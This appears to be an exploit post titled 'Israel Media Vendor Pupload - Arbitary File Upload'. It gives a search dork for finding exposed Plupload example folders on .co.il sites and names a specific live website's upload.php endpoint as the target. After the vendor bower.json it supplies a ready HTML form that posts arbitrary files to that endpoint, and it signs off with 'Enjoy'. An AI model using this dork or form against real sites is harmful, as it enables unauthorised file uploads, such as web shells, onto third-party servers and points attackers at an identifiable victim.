##########################################
# Exploit Title : Israel Media Vendor Pupload - Arbitary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:co.il
# Date : 11:41 PM 12/9/2017
# Exploit Author: Misterklio
# Category: Webapps
# Language: PHP
# Tested on: windows 7 / FireFox ##########################################
Info : ______________________________________________________________________
#view : https://www.alpinestyle.co.il/media/vendor/plupload/bower.json
#Test Upload : https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php
vendor Source :
{
"name": "plupload",
"license": "AGPLv3",
"authors": [
"Davit Barbakadze <davit.barbakadze@ephox.com>"
],
"homepage": "http://plupload.com",
"repository": {
"type": "git",
"url": "https://github.com/moxiecode/plupload.git"
},
"main": [
"./js/plupload.full.min.js"
],
"ignore": [
"tests/",
"src/",
"build/",
"examples/",
"Jakefile.js",
"package.json",
"bower.json",
"composer.json",
"README.md",
".*"
]
}
______________________________________________________________________
#Tools :
<!DOCTYPE html>
<html>
<body>
<form action="https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file">
<input type="submit" value="Upload" name="submit">
</form>
</body>
</html>
______________________________________________________________________
Enjoy By Mister klio